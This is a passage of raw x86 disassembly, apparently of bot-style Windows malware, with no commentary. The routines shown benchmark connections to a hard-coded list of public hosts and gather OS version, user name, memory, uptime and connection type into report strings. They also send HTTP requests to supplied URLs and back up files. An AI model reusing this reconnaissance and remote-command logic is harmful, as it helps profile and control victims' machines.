loc_41B5A8: ; CODE XREF: sub_41B3ED+1DB�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41B5AD: ; CODE XREF: sub_41B3ED+149�j
push [ebp+var_4]
call dword_4E42B8 ; closesocket
push [ebp+Memory] ; Memory
call _free
push esi ; Memory
call _free
pop ecx
pop ecx
loc_41B5C6: ; CODE XREF: sub_41B3ED+19�j
; sub_41B3ED+42�j ...
xor eax, eax
jmp short loc_41B5A8
sub_41B3ED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41B5CA(int,char *Str,int)
sub_41B5CA proc near ; CODE XREF: sub_401CC7+2E6A�p
Dest = byte ptr -26Ch
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 26Ch
push ebx
push esi
push edi
push 8
mov [ebp+var_4], 3
mov [ebp+var_3C], offset aWww_schlund_ne ; "www.schlund.net"
mov [ebp+var_38], offset aWww_utwente_nl ; "www.utwente.nl"
mov [ebp+var_34], offset aVerio_fr ; "verio.fr"
mov [ebp+var_30], offset aWww_1und1_de ; "www.1und1.de"
mov [ebp+var_2C], offset aWww_switch_ch ; "www.switch.ch"
mov [ebp+var_28], offset aWww_belwue_de ; "www.belwue.de"
mov [ebp+var_24], offset aDe_yahoo_com ; "de.yahoo.com"
mov [ebp+var_20], offset aWww_google_it ; "www.google.it"
mov [ebp+var_6C], offset aWww_xo_net ; "www.xo.net"
mov [ebp+var_68], offset aWww_stanford_e ; "www.stanford.edu"
mov [ebp+var_64], offset aWww_verio_com ; "www.verio.com"
mov [ebp+var_60], offset aWww_nocster_co ; "www.nocster.com"
mov [ebp+var_5C], offset aWww_rit_edu ; "www.rit.edu"
mov [ebp+var_58], offset aWww_cogentco_c ; "www.cogentco.com"
mov [ebp+var_54], offset aWww_burst_net ; "www.burst.net"
mov [ebp+var_50], offset aNitro_ucsc_edu ; "nitro.ucsc.edu"
mov [ebp+var_4C], offset aWww_level3_com ; "www.level3.com"
mov [ebp+var_48], offset aWww_above_net ; "www.above.net"
mov [ebp+var_44], offset aWww_easynews_c ; "www.easynews.com"
mov [ebp+var_40], offset aWww_google_com ; "www.google.com"
mov [ebp+var_1C], offset aWww_lib_nthu_e ; "www.lib.nthu.edu.tw"
mov [ebp+var_18], offset aWww_st_lib_kei ; "www.st.lib.keio.ac.jp"
mov [ebp+var_14], offset aWww_d1asia_com ; "www.d1asia.com"
mov [ebp+var_10], offset aWww_nifty_com ; "www.nifty.com"
mov [ebp+var_C], offset aYahoo_co_jp ; "yahoo.co.jp"
mov [ebp+var_8], offset aWww_google_co_ ; "www.google.co.jp"
call sub_41B3D3
push [ebp+eax*4+var_3C] ; Str
call sub_41B3ED
push 8
mov esi, eax
call sub_41B3D3
push [ebp+eax*4+var_3C] ; Str
call sub_41B3ED
add esp, 10h
test esi, esi
jz short loc_41B6CB
test eax, eax
jz short loc_41B6C7
lea ebx, [eax+esi]
shr ebx, 1
jmp short loc_41B6CD
; ---------------------------------------------------------------------------
loc_41B6C7: ; CODE XREF: sub_41B5CA+F4�j
mov ebx, esi
jmp short loc_41B6CD
; ---------------------------------------------------------------------------
loc_41B6CB: ; CODE XREF: sub_41B5CA+F0�j
mov ebx, eax
loc_41B6CD: ; CODE XREF: sub_41B5CA+FB�j
; sub_41B5CA+FF�j
push 0Ch
call sub_41B3D3
push [ebp+eax*4+var_6C] ; Str
call sub_41B3ED
push 0Ch
mov edi, eax
call sub_41B3D3
push [ebp+eax*4+var_6C] ; Str
call sub_41B3ED
add esp, 10h
test edi, edi
jz short loc_41B705
test eax, eax
jz short loc_41B701
lea esi, [eax+edi]
shr esi, 1
jmp short loc_41B707
; ---------------------------------------------------------------------------
loc_41B701: ; CODE XREF: sub_41B5CA+12E�j
mov esi, edi
jmp short loc_41B707
; ---------------------------------------------------------------------------
loc_41B705: ; CODE XREF: sub_41B5CA+12A�j
mov esi, eax
loc_41B707: ; CODE XREF: sub_41B5CA+135�j
; sub_41B5CA+139�j
push 6
call sub_41B3D3
push [ebp+eax*4+var_1C] ; Str
call sub_41B3ED
push 6
mov edi, eax
call sub_41B3D3
push [ebp+eax*4+var_1C] ; Str
call sub_41B3ED
add esp, 10h
test edi, edi
jz short loc_41B73F
test eax, eax
jz short loc_41B73B
lea ecx, [eax+edi]
shr ecx, 1
jmp short loc_41B741
; ---------------------------------------------------------------------------
loc_41B73B: ; CODE XREF: sub_41B5CA+168�j
mov ecx, edi
jmp short loc_41B741
; ---------------------------------------------------------------------------
loc_41B73F: ; CODE XREF: sub_41B5CA+164�j
mov ecx, eax
loc_41B741: ; CODE XREF: sub_41B5CA+16F�j
; sub_41B5CA+173�j
xor eax, eax
test ebx, ebx
jz short loc_41B74E
mov edi, [ebp+var_4]
mov eax, ebx
jmp short loc_41B751
; ---------------------------------------------------------------------------
loc_41B74E: ; CODE XREF: sub_41B5CA+17B�j
push 2
pop edi
loc_41B751: ; CODE XREF: sub_41B5CA+182�j
test esi, esi
jz short loc_41B759
add eax, esi
jmp short loc_41B75A
; ---------------------------------------------------------------------------
loc_41B759: ; CODE XREF: sub_41B5CA+189�j
dec edi
loc_41B75A: ; CODE XREF: sub_41B5CA+18D�j
test ecx, ecx
jz short loc_41B762
add eax, ecx
jmp short loc_41B763
; ---------------------------------------------------------------------------
loc_41B762: ; CODE XREF: sub_41B5CA+192�j
dec edi
loc_41B763: ; CODE XREF: sub_41B5CA+196�j
xor edx, edx
div edi
push eax
push ecx
push esi
push ebx
lea eax, [ebp+Dest]
push offset asc_452620 ; "-"
push eax ; Dest
call _sprintf
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
lea eax, [ebp+Dest]
push eax
call sub_415C77
add esp, 30h
pop edi
pop esi
pop ebx
leave
retn
sub_41B5CA endp
; =============== S U B R O U T I N E =======================================
sub_41B7A7 proc near ; CODE XREF: sub_401CC7+2595�p
; sub_401CC7+2A05�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
call ds:dword_4F63B0 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov ebx, 15180h
xor edx, edx
mov esi, ebx
mov edi, 0E10h
mov ebp, edi
push 3Ch
mov ecx, eax
sub ecx, [esp+14h+arg_0]
mov eax, ecx
div esi
mov esi, edx
xor edx, edx
mov eax, esi
div ebp
pop ebp
mov eax, edx
xor edx, edx
div ebp
xor edx, edx
push eax
mov eax, esi
div edi
xor edx, edx
mov esi, offset byte_4F45E0
push eax
mov eax, ecx
div ebx
push eax
push offset aDdDhDm ; "%dd %dh %dm"
push 32h ; Count
push esi ; Dest
call __snprintf
add esp, 18h
mov eax, esi
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41B7A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B810 proc near ; CODE XREF: sub_417AC3+24�p
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_84 = dword ptr -84h
push ebp
mov ebp, esp
sub esp, 94h
lea eax, [ebp+var_94]
push esi
push eax
xor esi, esi
mov [ebp+var_94], 94h
call ds:dword_4F63D0 ; GetVersionExA
test eax, eax
jz short loc_41B8A3
cmp [ebp+var_90], 4
jnz short loc_41B879
cmp [ebp+var_8C], esi
jnz short loc_41B861
cmp [ebp+var_84], 1
jnz short loc_41B854
push 1
pop esi
loc_41B854: ; CODE XREF: sub_41B810+3F�j
cmp [ebp+var_84], 2
jnz short loc_41B8A3
push 1
jmp short loc_41B8A2
; ---------------------------------------------------------------------------
loc_41B861: ; CODE XREF: sub_41B810+36�j
cmp [ebp+var_8C], 0Ah
jnz short loc_41B86E
loc_41B86A: ; CODE XREF: sub_41B810+78�j
push 2
jmp short loc_41B8A2
; ---------------------------------------------------------------------------
loc_41B86E: ; CODE XREF: sub_41B810+58�j
cmp [ebp+var_8C], 5Ah
jnz short loc_41B8A3
jmp short loc_41B893
; ---------------------------------------------------------------------------
loc_41B879: ; CODE XREF: sub_41B810+2E�j
cmp [ebp+var_90], 5
jnz short loc_41B8A3
cmp [ebp+var_8C], esi
jz short loc_41B86A
cmp [ebp+var_8C], 1
jnz short loc_41B897
loc_41B893: ; CODE XREF: sub_41B810+67�j
push 3
jmp short loc_41B8A2
; ---------------------------------------------------------------------------
loc_41B897: ; CODE XREF: sub_41B810+81�j
cmp [ebp+var_8C], 2
jnz short loc_41B8A3
push 7
loc_41B8A2: ; CODE XREF: sub_41B810+4F�j
; sub_41B810+5C�j ...
pop esi
loc_41B8A3: ; CODE XREF: sub_41B810+25�j
; sub_41B810+4B�j ...
mov eax, esi
pop esi
leave
retn
sub_41B810 endp
; =============== S U B R O U T I N E =======================================
sub_41B8A8 proc near ; CODE XREF: sub_41B964+290�p
push ebx
push esi
push edi
mov esi, 0F4240h
loc_41B8B0: ; CODE XREF: sub_41B8A8+35�j
; sub_41B8A8+3B�j
call sub_41BCDA
push 3E8h
mov edi, eax
mov ebx, edx
call ds:dword_4F6380 ; Sleep
call sub_41BCDA
sub eax, edi
push 0
sbb edx, ebx
push esi
push edx
push eax
call __aulldiv
mov edi, edx
mov ebx, eax
test edi, edi
ja short loc_41B8B0
jb short loc_41B8E5
cmp ebx, esi
ja short loc_41B8B0
loc_41B8E5: ; CODE XREF: sub_41B8A8+37�j
push 0
push 64h
push edi
push ebx
call __aullrem
mov ecx, edx
push 64h
xor edx, edx
mov esi, eax
test ecx, ecx
pop eax
ja short loc_41B958
jb short loc_41B904
cmp esi, 50h
jnb short loc_41B909
loc_41B904: ; CODE XREF: sub_41B8A8+55�j
push 4Bh
xor edx, edx
pop eax
loc_41B909: ; CODE XREF: sub_41B8A8+5A�j
test ecx, ecx
ja short loc_41B958
jb short loc_41B914
cmp esi, 47h
jnb short loc_41B919
loc_41B914: ; CODE XREF: sub_41B8A8+65�j
push 42h
xor edx, edx
pop eax
loc_41B919: ; CODE XREF: sub_41B8A8+6A�j
test ecx, ecx
ja short loc_41B958
jb short loc_41B924
cmp esi, 37h
jnb short loc_41B929
loc_41B924: ; CODE XREF: sub_41B8A8+75�j
push 32h
xor edx, edx
pop eax
loc_41B929: ; CODE XREF: sub_41B8A8+7A�j
test ecx, ecx
ja short loc_41B958
jb short loc_41B934
cmp esi, 26h
jnb short loc_41B939
loc_41B934: ; CODE XREF: sub_41B8A8+85�j
push 21h
xor edx, edx
pop eax
loc_41B939: ; CODE XREF: sub_41B8A8+8A�j
test ecx, ecx
ja short loc_41B958
jb short loc_41B944
cmp esi, 1Eh
jnb short loc_41B949
loc_41B944: ; CODE XREF: sub_41B8A8+95�j
push 19h
xor edx, edx
pop eax
loc_41B949: ; CODE XREF: sub_41B8A8+9A�j
test ecx, ecx
ja short loc_41B958
jb short loc_41B954
cmp esi, 0Ah
jnb short loc_41B958
loc_41B954: ; CODE XREF: sub_41B8A8+A5�j
xor eax, eax
xor edx, edx
loc_41B958: ; CODE XREF: sub_41B8A8+53�j
; sub_41B8A8+63�j ...
sub eax, esi
sbb edx, ecx
add eax, ebx
adc edx, edi
pop edi
pop esi
pop ebx
retn
sub_41B8A8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B964 proc near ; CODE XREF: sub_401CC7+2760�p
var_7E8 = byte ptr -7E8h
var_668 = byte ptr -668h
var_5E8 = byte ptr -5E8h
var_568 = byte ptr -568h
FullPath = byte ptr -4E8h
var_3E4 = byte ptr -3E4h
Dest = byte ptr -2E8h
var_25C = word ptr -25Ch
var_25A = byte ptr -25Ah
var_15C = byte ptr -15Ch
var_114 = byte ptr -114h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
Dst = byte ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
Drive = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7E8h
push ebx
push esi
lea eax, [ebp+var_CC]
push edi
push eax
mov [ebp+var_4], offset dword_4F4618
mov [ebp+var_CC], 94h
call ds:dword_4F63D0 ; GetVersionExA
xor ebx, ebx
cmp [ebp+var_C8], 4
jnz short loc_41B9EB
cmp [ebp+var_C4], ebx
jnz short loc_41B9C7
cmp [ebp+var_BC], 1
jnz short loc_41B9B1
mov [ebp+var_4], offset a95_0 ; "95"
loc_41B9B1: ; CODE XREF: sub_41B964+44�j
cmp [ebp+var_BC], 2
jnz loc_41BA66
mov [ebp+var_4], offset aNt_0 ; "NT"
jmp short loc_41BA37
; ---------------------------------------------------------------------------
loc_41B9C7: ; CODE XREF: sub_41B964+3B�j
cmp [ebp+var_C4], 0Ah
jnz short loc_41B9D9
mov [ebp+var_4], offset a98_0 ; "98"
jmp short loc_41BA2E
; ---------------------------------------------------------------------------
loc_41B9D9: ; CODE XREF: sub_41B964+6A�j
cmp [ebp+var_C4], 5Ah
jnz short loc_41BA27
mov [ebp+var_4], offset aMe_1 ; "ME"
jmp short loc_41BA2E
; ---------------------------------------------------------------------------
loc_41B9EB: ; CODE XREF: sub_41B964+33�j
cmp [ebp+var_C8], 5
jnz short loc_41BA27
cmp [ebp+var_C4], ebx
jnz short loc_41BA05
mov [ebp+var_4], offset a2k_0 ; "2K"
jmp short loc_41BA2E
; ---------------------------------------------------------------------------
loc_41BA05: ; CODE XREF: sub_41B964+96�j
cmp [ebp+var_C4], 1
jnz short loc_41BA17
mov [ebp+var_4], offset aXp_0 ; "XP"
jmp short loc_41BA2E
; ---------------------------------------------------------------------------
loc_41BA17: ; CODE XREF: sub_41B964+A8�j
cmp [ebp+var_C4], 2
mov [ebp+var_4], offset a2003 ; "2003"
jz short loc_41BA2E
loc_41BA27: ; CODE XREF: sub_41B964+7C�j
; sub_41B964+8E�j
mov [ebp+var_4], offset a???_0 ; "???"
loc_41BA2E: ; CODE XREF: sub_41B964+73�j
; sub_41B964+85�j ...
cmp [ebp+var_BC], 2
jnz short loc_41BA66
loc_41BA37: ; CODE XREF: sub_41B964+61�j
cmp [ebp+var_B8], bl
jz short loc_41BA66
lea eax, [ebp+var_B8]
push eax
lea eax, [ebp+Dest]
push [ebp+var_4]
push offset aSS_12 ; "%s (%s)"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dest]
add esp, 10h
mov [ebp+var_4], eax
loc_41BA66: ; CODE XREF: sub_41B964+54�j
; sub_41B964+D1�j ...
mov ax, word_4526B8
push 3Fh
mov [ebp+var_25C], ax
pop ecx
xor eax, eax
lea edi, [ebp+var_25A]
rep stosd
stosw
mov eax, dword_4E4100
mov [ebp+var_C], 100h
cmp eax, ebx
jz short loc_41BA9F
lea ecx, [ebp+var_C]
push ecx
lea ecx, [ebp+var_25C]
push ecx
call eax ; GetUserNameA
loc_41BA9F: ; CODE XREF: sub_41B964+12C�j
push [ebp+arg_4]
call sub_40AFA9
pop ecx
push eax
call dword_4E4260 ; inet_addr
mov [ebp+var_8], eax
push 2
lea eax, [ebp+var_8]
push 4
push eax
call dword_4E41D8 ; gethostbyaddr
cmp eax, ebx
jz short loc_41BAC8
push dword ptr [eax]
jmp short loc_41BACD
; ---------------------------------------------------------------------------
loc_41BAC8: ; CODE XREF: sub_41B964+15E�j
push offset aCouldnTResolve ; "couldn't resolve host"
loc_41BACD: ; CODE XREF: sub_41B964+162�j
lea eax, [ebp+var_3E4]
push eax ; Dest
call _sprintf
pop ecx
lea eax, [ebp+FullPath]
pop ecx
push 104h
push eax
call ds:dword_4F637C ; GetSystemDirectoryA
lea eax, [ebp+var_114]
push 46h
push eax
push offset aDdMmmYyyy ; "dd:MMM:yyyy"
push ebx
mov esi, 409h
push ebx
push esi
call ds:dword_4F640C ; GetDateFormatA
lea eax, [ebp+var_15C]
push 46h
push eax
push offset aHhMmSs_0 ; "HH:mm:ss"
push ebx
push ebx
push esi
call ds:dword_4F6408 ; GetTimeFormatA
push 20h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
push eax
call ds:dword_4F649C ; GlobalMemoryStatus
push ebx ; Ext
push ebx ; Filename
lea eax, [ebp+Drive]
push ebx ; Dir
push eax ; Drive
lea eax, [ebp+FullPath]
push eax ; FullPath
call __splitpath
lea eax, [ebp+Drive]
push eax
lea eax, [ebp+var_7E8]
push eax
call sub_4175D3
push 60h
mov esi, eax
pop ecx
lea edi, [ebp+var_7E8]
rep movsd
push 60h
lea esi, [ebp+var_7E8]
pop ecx
lea edi, [ebp+var_668]
rep movsd
push ebx
call sub_41B7A7
add esp, 20h
push eax
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_25C]
push eax
push [ebp+arg_4]
call sub_40AFA9
pop ecx
push eax
lea eax, [ebp+var_3E4]
push eax
lea eax, [ebp+FullPath]
push eax
lea eax, [ebp+var_5E8]
push [ebp+var_C0]
push [ebp+var_C4]
push [ebp+var_C8]
push [ebp+var_4]
push eax
lea eax, [ebp+var_568]
push eax
mov eax, [ebp+var_2C]
shr eax, 0Ah
push ebx
push eax
call sub_4174C3
pop ecx
pop ecx
push eax
mov eax, [ebp+var_30]
shr eax, 0Ah
push ebx
push eax
call sub_4174C3
pop ecx
pop ecx
push eax
call sub_41B8A8
push edx
push eax
push offset asc_4526EC ; "-"
push 200h ; Count
push [ebp+arg_0] ; Dest
call __snprintf
mov eax, [ebp+arg_0]
add esp, 50h
pop edi
pop esi
pop ebx
leave
retn
sub_41B964 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BC18 proc near ; CODE XREF: sub_401CC7+278E�p
; sub_401CC7+744B�p
Dst = byte ptr -8Ch
var_C = byte ptr -0Ch
Dest = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8Ch
push esi
mov esi, 80h
push esi ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
cmp dword_4E4308, 0
jnz short loc_41BC84
push 0
lea eax, [ebp+Dst]
push esi
push eax
lea eax, [ebp+var_C]
push eax
call dword_4E40E4 ; InternetGetConnectedStateEx
test eax, eax
jnz short loc_41BC6D
lea eax, [ebp+Dst]
push offset aNotConnected ; "Not connected"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_41BC6D: ; CODE XREF: sub_41BC18+40�j
test [ebp+var_C], 1
jz short loc_41BC7A
push offset aDialUp ; "Dial-up"
jmp short loc_41BC7F
; ---------------------------------------------------------------------------
loc_41BC7A: ; CODE XREF: sub_41BC18+59�j
push offset off_4527E0
loc_41BC7F: ; CODE XREF: sub_41BC18+60�j
lea eax, [ebp+Dest]
jmp short loc_41BC9F
; ---------------------------------------------------------------------------
loc_41BC84: ; CODE XREF: sub_41BC18+28�j
lea eax, [ebp+Dest]
push offset aNA ; "N/A"
push eax ; Dest
call _sprintf
pop ecx
lea eax, [ebp+Dst]
pop ecx
push offset aNA_0 ; "N/A"
loc_41BC9F: ; CODE XREF: sub_41BC18+6A�j
push eax ; Dest
call _sprintf
pop ecx
pop ecx
push [ebp+arg_4]
push [ebp+arg_8]
call sub_40AFA9
pop ecx
push eax
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+Dest]
push eax
push offset asc_4527EC ; "-"
push 200h ; Count
push [ebp+arg_0] ; Dest
call __snprintf
mov eax, [ebp+arg_0]
add esp, 1Ch
pop esi
leave
retn
sub_41BC18 endp
; =============== S U B R O U T I N E =======================================
sub_41BCDA proc near ; CODE XREF: sub_41B8A8:loc_41B8B0�p
; sub_41B8A8+1C�p
rdtsc
retn
sub_41BCDA endp
; ---------------------------------------------------------------------------
loc_41BCDD: ; DATA XREF: sub_401CC7+7869�o
push ebp
mov ebp, esp
sub esp, 65Ch
mov eax, [ebp+8]
push ebx
push esi
push edi
push 65h
mov esi, eax
pop ecx
lea edi, [ebp-35Ch]
rep movsd
push 1
mov edi, 80h
pop esi
xor ebx, ebx
mov [eax+190h], esi
push edi
lea eax, [ebp-148h]
push ebx
push eax
mov [ebp-0Ch], ebx
mov [ebp-4], ebx
mov dword ptr [ebp-8], offset dword_452830
call _memset
push edi
lea eax, [ebp-1C8h]
push ebx
push eax
call _memset
push edi
lea eax, [ebp-0C8h]
push ebx
push eax
call _memset
push 100h
lea eax, [ebp-65Ch]
push ebx
push eax
call _memset
push 3Ch
lea eax, [ebp-48h]
pop edi
push edi
push ebx
push eax
call _memset
add esp, 3Ch
lea eax, [ebp-48h]
mov [ebp-48h], edi
mov [ebp-34h], esi
push eax
lea eax, [ebp-358h]
push ebx
push eax
mov [ebp-28h], esi
mov [ebp-20h], esi
mov [ebp-18h], esi
call _strlen
pop ecx
push eax
lea eax, [ebp-358h]
push eax
call dword_4E411C ; InternetCrackUrlA
test eax, eax
jz loc_41BE77
cmp [ebp-34h], ebx
jbe short loc_41BDB4
push dword ptr [ebp-34h]
lea eax, [ebp-148h]
push dword ptr [ebp-38h]
push eax
call _strncpy
add esp, 0Ch
loc_41BDB4: ; CODE XREF: .text:0041BD9D�j
cmp [ebp-28h], ebx
movzx esi, word ptr [ebp-30h]
jbe short loc_41BDD2
push dword ptr [ebp-28h]
lea eax, [ebp-1C8h]
push dword ptr [ebp-2Ch]
push eax
call _strncpy
add esp, 0Ch
loc_41BDD2: ; CODE XREF: .text:0041BDBB�j
cmp [ebp-20h], ebx
jbe short loc_41BDEC
push dword ptr [ebp-20h]
lea eax, [ebp-0C8h]
push dword ptr [ebp-24h]
push eax
call _strncpy
add esp, 0Ch
loc_41BDEC: ; CODE XREF: .text:0041BDD5�j
cmp [ebp-18h], ebx
jbe short loc_41BE06
push dword ptr [ebp-18h]
lea eax, [ebp-65Ch]
push dword ptr [ebp-1Ch]
push eax
call _strncpy
add esp, 0Ch
loc_41BE06: ; CODE XREF: .text:0041BDEF�j
push ebx
push ebx
lea eax, [ebp-0C8h]
push 3
push eax
lea eax, [ebp-1C8h]
push eax
lea eax, [ebp-148h]
push esi
push eax
push dword_4E41D0
call dword_4E41F4 ; InternetConnectA
mov esi, eax
cmp esi, ebx
jz short loc_41BE8F
push ebx
lea eax, [ebp-8]
push 200h
push eax
lea eax, [ebp-2D8h]
push eax
lea eax, [ebp-65Ch]
push ebx
push eax
push ebx
push esi
call dword_4E41E8 ; HttpOpenRequestA
cmp eax, ebx
mov [ebp-4], eax
jz short loc_41BE96
push ebx
push ebx
push ebx
push ebx
push eax
call dword_4E4194 ; HttpSendRequestA
test eax, eax
jz short loc_41BE70
push offset dword_4528AC
jmp short loc_41BE9B
; ---------------------------------------------------------------------------
loc_41BE70: ; CODE XREF: .text:0041BE67�j
push offset unk_4528C8
jmp short loc_41BE9B
; ---------------------------------------------------------------------------
loc_41BE77: ; CODE XREF: .text:0041BD94�j
lea eax, [ebp-55Ch]
push offset dword_452834
push eax
call _sprintf
mov esi, [ebp-0Ch]
pop ecx
pop ecx
jmp short loc_41BEA9
; ---------------------------------------------------------------------------
loc_41BE8F: ; CODE XREF: .text:0041BE30�j
push offset unk_452850
jmp short loc_41BE9B
; ---------------------------------------------------------------------------
loc_41BE96: ; CODE XREF: .text:0041BE58�j
push offset unk_45287C
loc_41BE9B: ; CODE XREF: .text:0041BE6E�j
; .text:0041BE75�j ...
lea eax, [ebp-55Ch]
push eax
call _sprintf
pop ecx
pop ecx
loc_41BEA9: ; CODE XREF: .text:0041BE8D�j
cmp [ebp-1D4h], ebx
jnz short loc_41BED4
push ebx
lea eax, [ebp-55Ch]
push dword ptr [ebp-1D0h]
push eax
lea eax, [ebp-258h]
push eax
push dword ptr [ebp-35Ch]
call sub_409D6C
add esp, 14h
loc_41BED4: ; CODE XREF: .text:0041BEAF�j
lea eax, [ebp-55Ch]
push eax
call sub_415C77
pop ecx
push esi
call dword_4E4254 ; InternetCloseHandle
push dword ptr [ebp-4]
call dword_4E4254 ; InternetCloseHandle
push dword ptr [ebp-1D8h]
call sub_40BAAA
pop ecx
push ebx
call ds:dword_4F63D4 ; ExitThread
pop edi
pop esi
pop ebx
; ---------------------------------------------------------------------------
db 9 dup(0CCh)
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 18h
lea eax, [ebp-0Ch]
push eax
mov ecx, [ebp+8]
push ecx
call sub_43B91C
mov [ebp-4], eax
cmp dword ptr [ebp-4], 0
jnz short loc_41BF33
xor eax, eax
jmp loc_41C062
; ---------------------------------------------------------------------------
loc_41BF33: ; CODE XREF: .text:0041BF2A�j
mov edx, [ebp-4]
push edx
call _malloc
add esp, 4
mov [ebp-10h], eax
cmp dword ptr [ebp-10h], 0
jnz short loc_41BF4F
xor eax, eax
jmp loc_41C062
; ---------------------------------------------------------------------------
loc_41BF4F: ; CODE XREF: .text:0041BF46�j
mov eax, [ebp-10h]
push eax
mov ecx, [ebp-4]
push ecx
mov edx, [ebp-0Ch]
push edx
mov eax, [ebp+8]
push eax
call sub_43B916
test eax, eax
jnz short loc_41BF7B
mov ecx, [ebp-10h]
push ecx
call _free
add esp, 4
xor eax, eax
jmp loc_41C062
; ---------------------------------------------------------------------------
loc_41BF7B: ; CODE XREF: .text:0041BF66�j
lea edx, [ebp-14h]
push edx
lea eax, [ebp-8]
push eax
push offset asc_452904 ; "\\"
mov ecx, [ebp-10h]
push ecx
call sub_43B910
test eax, eax
jz loc_41C054
mov edx, [ebp-8]
mov eax, [edx+0Ch]
shr eax, 10h
and eax, 0FFFFh
cmp eax, 0A28h
jnz loc_41C054
mov ecx, [ebp-8]
mov edx, [ecx+0Ch]
and edx, 0FFFFh
and edx, 0FFFFh
mov [ebp-18h], edx
cmp dword ptr [ebp-18h], 0A7Dh
jg short loc_41BFED
cmp dword ptr [ebp-18h], 0A7Dh
jz short loc_41C031
cmp dword ptr [ebp-18h], 884h
jz short loc_41BFF8
cmp dword ptr [ebp-18h], 9C9h
jz short loc_41C01E
jmp short loc_41C044
; ---------------------------------------------------------------------------
loc_41BFED: ; CODE XREF: .text:0041BFCE�j
cmp dword ptr [ebp-18h], 0B4Ch
jz short loc_41C00B
jmp short loc_41C044
; ---------------------------------------------------------------------------
loc_41BFF8: ; CODE XREF: .text:0041BFE0�j
mov eax, [ebp-10h]
push eax
call _free
add esp, 4
mov eax, 1
jmp short loc_41C062
; ---------------------------------------------------------------------------
loc_41C00B: ; CODE XREF: .text:0041BFF4�j
mov ecx, [ebp-10h]
push ecx
call _free
add esp, 4
mov eax, 2
jmp short loc_41C062
; ---------------------------------------------------------------------------
loc_41C01E: ; CODE XREF: .text:0041BFE9�j
mov edx, [ebp-10h]
push edx
call _free
add esp, 4
mov eax, 3
jmp short loc_41C062
; ---------------------------------------------------------------------------
loc_41C031: ; CODE XREF: .text:0041BFD7�j
mov eax, [ebp-10h]
push eax
call _free
add esp, 4
mov eax, 4
jmp short loc_41C062
; ---------------------------------------------------------------------------
loc_41C044: ; CODE XREF: .text:0041BFEB�j
; .text:0041BFF6�j
mov ecx, [ebp-10h]
push ecx
call _free
add esp, 4
xor eax, eax
jmp short loc_41C062
; ---------------------------------------------------------------------------
loc_41C054: ; CODE XREF: .text:0041BF93�j
; .text:0041BFAC�j
mov edx, [ebp-10h]
push edx
call _free
add esp, 4
xor eax, eax
loc_41C062: ; CODE XREF: .text:0041BF2E�j
; .text:0041BF4A�j ...
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 94h
lea eax, [ebp-94h]
mov dword ptr [ebp-94h], 94h
push eax
call ds:dword_4F63D0 ; GetVersionExA
cmp dword ptr [ebp-90h], 5
jnz short loc_41C0B1
cmp dword ptr [ebp-8Ch], 1
jnz short loc_41C0B1
lea eax, [ebp-80h]
push offset a2 ; "2"
push eax
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_41C0B1
push 1
pop eax
leave
retn
; ---------------------------------------------------------------------------
loc_41C0B1: ; CODE XREF: .text:0041C08D�j
; .text:0041C096�j ...
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 104h
push dword ptr [ebp+8]
lea eax, [ebp-104h]
push offset aS_bck ; "%s.bck"
push eax
call _sprintf
add esp, 0Ch
lea eax, [ebp-104h]
push 0
push eax
push dword ptr [ebp+8]
call ds:dword_4F6398 ; CopyFileA
neg eax
sbb eax, eax
neg eax
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C0EF proc near ; CODE XREF: .text:0041C213�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
lea eax, [ebp+var_200]
push 100h
